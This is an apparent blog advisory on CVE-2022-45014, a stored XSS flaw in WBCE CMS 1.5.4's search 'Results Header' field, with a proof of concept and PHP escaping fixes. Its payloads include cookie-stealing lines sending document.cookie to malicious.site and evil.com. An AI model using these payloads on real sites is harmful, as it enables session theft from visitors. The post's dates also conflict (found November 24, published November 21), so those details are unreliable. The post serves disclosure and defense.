On November 24, 2022, a serious cross-site scripting (XSS) vulnerability was found in WBCE CMS version 1.5.4, affecting its Search Settings module. Tracked as CVE-2022-45014, this bug allows attackers to run malicious JavaScript or inject HTML via the "Results Header" field. Even though XSS bugs like this are common, this one poses a real risk because it affects a default module of a popular content management system (CMS).

This post explains how the vulnerability works, shows you actual code snippets that exploit it, and gives advice on staying safe. Whether you're a developer, a site owner, or just curious, you'll find everything you need here, written in plain American English.

What is WBCE CMS?

WBCE CMS is an open-source content management system, popular for small business and personal websites. Like WordPress, it features modules for common functions—one of which is the "Search" module. The Search module has a hidden danger in how it handles the "Results Header" field.

Official Advisory

CVE-2022-45014 describes an XSS vulnerability in the Search Settings of WBCE CMS 1.5.4.

- Field: Results Header
- Impact: An attacker who can edit this field can inject JavaScript that runs in the browser of anyone who loads a search results page, administrators included

References

- MITRE CVE Entry
- Exploit-DB #51035

How Does the Attack Work?

The Search module lets an administrator customize the text above the search results via the "Results Header" field. Unfortunately, the input isn’t properly sanitized or filtered. This means anything typed in that box will be displayed as raw HTML/JavaScript to end-users.

If an attacker can change this field (by phishing or exploiting another vulnerability to gain admin access), they can make every search page run malicious code.

1. Gaining Access

- Prerequisite: Access to edit Search Settings (usually requires admin or someone with Search module permissions)

- Type or paste this payload into the "Results Header" field:

<script>alert('XSS by CVE-2022-45014');</script>

  Or, for a stealthier attack:

<img src="x" onerror="fetch('https://malicious.site/cookie?c='+document.cookie)">

- Save the settings.

- Anyone who performs a search on the website now receives the Results Header rendered as-is, including the injected <script>, and their browser executes the code.

Demo exploit

<script>alert('Hacked! XSS CVE-2022-45014')</script>

PoC (Proof of Concept) Step-by-Step

Step 1: Authenticate as an administrator (or any user who can edit Search Settings).

Step 2: Visit the Search module settings

http://yoursite.com/admin/modules/search/settings.php

Step 3: Find the "Results Header" field and paste the following code

<script>window.location='https://evil.com/?cookie='+document.cookie</script>;

Step 4: Click "Save".

Step 5: Now, on the public site, perform any search.

How to Fix

Status: The bug is fixed in later versions (1.5.5 and above). Upgrade WBCE CMS now!

If you can't update

- Edit modules/search/settings.php and escape $results_header on output with htmlspecialchars() (or the CMS's own escaping functions) before it is written into the page.
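As an added illustration of that fix (example code written here, not WBCE's own source), the following PHP contrasts unescaped output of the stored setting with the escaped form and adds a small check for spotting stored values that already contain markup. The function names, the <h2> wrapper and the audit regex are assumptions; only $results_header and htmlspecialchars() come from the text above.

```php
<?php
// Added example, not WBCE CMS code. WBCE's real template handling is not
// reproduced; $results_header is simply the variable name used in the text.

// Vulnerable pattern: the stored setting is concatenated into the page unescaped,
// so any markup an editor saved is handed to the browser as live HTML.
function render_results_header_unsafe(string $results_header): string
{
    return '<h2 class="search-results-header">' . $results_header . '</h2>';
}

// Fixed pattern: escape on output for an HTML text context.
// ENT_QUOTES also escapes single quotes, ENT_SUBSTITUTE keeps invalid UTF-8
// from turning the whole string into "", and the charset is stated explicitly.
function render_results_header_safe(string $results_header): string
{
    $escaped = htmlspecialchars(
        $results_header,
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    );
    return '<h2 class="search-results-header">' . $escaped . '</h2>';
}

// Audit heuristic for an existing database after upgrading: true when the
// stored value carries a tag, an inline event handler or a javascript: URL.
// It is a triage aid, not a sanitizer; escaping on output is the actual fix.
function results_header_looks_injected(string $results_header): bool
{
    return (bool) preg_match('/<\s*\/?[a-z]|\bon[a-z]+\s*=|javascript:/i', $results_header);
}

// Constructed sample value of the kind discussed above.
$stored = '<script>alert(1)</script>';

echo "unsafe: ", render_results_header_unsafe($stored), PHP_EOL;
echo "safe:   ", render_results_header_safe($stored), PHP_EOL;
echo "flagged: ", results_header_looks_injected($stored) ? 'yes' : 'no', PHP_EOL;
```

Running the audit function over every stored module setting, not just this one field, is a cheap way to confirm nothing was planted before the upgrade.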

Additional Resources

- WBCE Forum Announcement
- Exploit Database Entry
- OWASP XSS Cheat Sheet

Conclusion

CVE-2022-45014 is a textbook example of how seemingly simple input fields can become serious security liabilities. If you run WBCE CMS, check your version and update as soon as possible. Always sanitize output—never trust user input, even in admin-only settings.

Stay safe, patch quickly, and keep an eye out for more vulnerabilities like this.


*Written exclusively for you. If you have questions about similar XSS bugs, or need help securing your CMS, reach out any time.*

Timeline

Published on: 11/21/2022 15:15:00 UTC
Last modified on: 11/21/2022 20:27:00 UTC